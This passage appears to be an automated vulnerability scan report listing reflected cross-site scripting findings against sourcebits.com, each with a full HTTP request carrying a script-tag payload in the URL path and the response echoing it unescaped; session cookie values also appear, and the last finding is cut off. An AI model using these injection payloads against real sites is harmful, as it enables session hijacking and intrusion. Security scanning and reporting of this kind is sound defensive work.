HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:20 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js/jquery-1.3.2.min.jsf9fa9<script>alert(1)</script>9166bedf7fc?1265536927</h2>
...[SNIP]...

1.82. http://www.sourcebits.com/js/jquery-1.3.2.min.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/jquery-1.3.2.min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41fc2"><script>alert(1)</script>492a52315c0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/jquery-1.3.2.min.js41fc2"><script>alert(1)</script>492a52315c0?1265536927 HTTP/1.1
Host: www.sourcebits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/?565bd%3Cscript%3Ealert(document.location)%3C/script%3E4880f07d5a7=1
Cookie: PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:18 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js/jquery-1.3.2.min.js41fc2"><script>alert(1)</script>492a52315c0?1265536927" />
...[SNIP]...

1.83. http://www.sourcebits.com/js/jquery-ui-1.8.12.custom.min.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/jquery-ui-1.8.12.custom.min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86632"><script>alert(1)</script>c826ccfc23e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js86632"><script>alert(1)</script>c826ccfc23e/jquery-ui-1.8.12.custom.min.js?1305313041 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:07 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js86632"><script>alert(1)</script>c826ccfc23e/jquery-ui-1.8.12.custom.min.js?1305313041" />
...[SNIP]...

1.84. http://www.sourcebits.com/js/jquery-ui-1.8.12.custom.min.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/jquery-ui-1.8.12.custom.min.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload df3a4<script>alert(1)</script>d316e95cbb2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsdf3a4<script>alert(1)</script>d316e95cbb2/jquery-ui-1.8.12.custom.min.js?1305313041 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:11 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/jsdf3a4<script>alert(1)</script>d316e95cbb2/jquery-ui-1.8.12.custom.min.js?1305313041</h2>
...[SNIP]...

1.85. http://www.sourcebits.com/js/jquery-ui-1.8.12.custom.min.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/jquery-ui-1.8.12.custom.min.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eff75<script>alert(1)</script>e8fe75afd9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/jquery-ui-1.8.12.custom.min.jseff75<script>alert(1)</script>e8fe75afd9?1305313041 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:31 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js/jquery-ui-1.8.12.custom.min.jseff75<script>alert(1)</script>e8fe75afd9?1305313041</h2>
...[SNIP]...

1.86. http://www.sourcebits.com/js/jquery-ui-1.8.12.custom.min.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/jquery-ui-1.8.12.custom.min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 664da"><script>alert(1)</script>9cac43cf36b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/jquery-ui-1.8.12.custom.min.js664da"><script>alert(1)</script>9cac43cf36b?1305313041 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:22 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js/jquery-ui-1.8.12.custom.min.js664da"><script>alert(1)</script>9cac43cf36b?1305313041" />
...[SNIP]...

1.87. http://www.sourcebits.com/js/jquery.colorbox-min.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/jquery.colorbox-min.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 23356<script>alert(1)</script>c14ac66b65f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js23356<script>alert(1)</script>c14ac66b65f/jquery.colorbox-min.js?1265536927 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/design
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:19 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js23356<script>alert(1)</script>c14ac66b65f/jquery.colorbox-min.js?1265536927</h2>
...[SNIP]...

1.88. http://www.sourcebits.com/js/jquery.colorbox-min.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/jquery.colorbox-min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ce3b"><script>alert(1)</script>6524aeb943d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js3ce3b"><script>alert(1)</script>6524aeb943d/jquery.colorbox-min.js?1265536927 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/design
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:16 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js3ce3b"><script>alert(1)</script>6524aeb943d/jquery.colorbox-min.js?1265536927" />
...[SNIP]...

1.89. http://www.sourcebits.com/js/jquery.colorbox-min.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/jquery.colorbox-min.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload df649<script>alert(1)</script>075c9c8a6af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/jquery.colorbox-min.jsdf649<script>alert(1)</script>075c9c8a6af?1265536927 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/design
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:31 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js/jquery.colorbox-min.jsdf649<script>alert(1)</script>075c9c8a6af?1265536927</h2>
...[SNIP]...

1.90. http://www.sourcebits.com/js/jquery.colorbox-min.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/jquery.colorbox-min.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c614"><script>alert(1)</script>82218e57a1d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/jquery.colorbox-min.js5c614"><script>alert(1)</script>82218e57a1d?1265536927 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/design
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163152062.1305928078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163152062.2103716654.1305928078.1305928078.1305928078.1; __utmc=163152062; __utmb=163152062.1.10.1305928078; PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:55:29 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js/jquery.colorbox-min.js5c614"><script>alert(1)</script>82218e57a1d?1265536927" />
...[SNIP]...

1.91. http://www.sourcebits.com/js/jquery.easing.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/jquery.easing.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eaa03"><script>alert(1)</script>57f6e9e3b41 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jseaa03"><script>alert(1)</script>57f6e9e3b41/jquery.easing.js?1265536927 HTTP/1.1
Host: www.sourcebits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/?565bd%3Cscript%3Ealert(document.location)%3C/script%3E4880f07d5a7=1
Cookie: PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:04 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/jseaa03"><script>alert(1)</script>57f6e9e3b41/jquery.easing.js?1265536927" />
...[SNIP]...

1.92. http://www.sourcebits.com/js/jquery.easing.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/jquery.easing.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 43ef7<script>alert(1)</script>4031793e27a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js43ef7<script>alert(1)</script>4031793e27a/jquery.easing.js?1265536927 HTTP/1.1
Host: www.sourcebits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/?565bd%3Cscript%3Ealert(document.location)%3C/script%3E4880f07d5a7=1
Cookie: PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:07 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js43ef7<script>alert(1)</script>4031793e27a/jquery.easing.js?1265536927</h2>
...[SNIP]...

1.93. http://www.sourcebits.com/js/jquery.easing.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/jquery.easing.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload be6d0<script>alert(1)</script>9764647f121 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/jquery.easing.jsbe6d0<script>alert(1)</script>9764647f121?1265536927 HTTP/1.1
Host: www.sourcebits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/?565bd%3Cscript%3Ealert(document.location)%3C/script%3E4880f07d5a7=1
Cookie: PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:19 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<h2>You were trying to reach http://www.sourcebits.com/js/jquery.easing.jsbe6d0<script>alert(1)</script>9764647f121?1265536927</h2>
...[SNIP]...

1.94. http://www.sourcebits.com/js/jquery.easing.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/jquery.easing.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbb39"><script>alert(1)</script>9563b534f36 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/jquery.easing.jscbb39"><script>alert(1)</script>9563b534f36?1265536927 HTTP/1.1
Host: www.sourcebits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/?565bd%3Cscript%3Ealert(document.location)%3C/script%3E4880f07d5a7=1
Cookie: PHPSESSID=1fqsfclgikrhu2gr4fir36fp36; X-Mapping-nbhajkek=6075C85ECEB9C622B855771404A705BE

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:51:16 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js/jquery.easing.jscbb39"><script>alert(1)</script>9563b534f36?1265536927" />
...[SNIP]...

1.95. http://www.sourcebits.com/js/jquery.imgpreload.min.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/jquery.imgpreload.min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a147"><script>alert(1)</script>f06e504d68 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js9a147"><script>alert(1)</script>f06e504d68/jquery.imgpreload.min.js?1305348156 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=vtaam4slf514spuap2khebtuj4; X-Mapping-nbhajkek=BDC73E7CC2D1E217869AC63E75EE3DA7

Response

HTTP/1.0 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Fri, 20 May 2011 21:48:13 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 28722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- IMPORTANT NOTE :: Do Not
...[SNIP]...
<link rel="canonical" href="http://www.sourcebits.com/js9a147"><script>alert(1)</script>f06e504d68/jquery.imgpreload.min.js?1305348156" />
...[SNIP]...

1.96. http://www.sourcebits.com/js/jquery.imgpreload.min.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcebits.com
Path:   /js/jquery.imgpreload.min.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d06f8<script>alert(1)</script>187267bc4e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsd06f8<script>alert(1)</script>187267bc4e3/jquery.imgpreload.min.js?1305348156 HTTP/1.1
Host: www.sourcebits.com
Proxy-Connection: keep-alive
Referer: http://www.sourcebits.com/
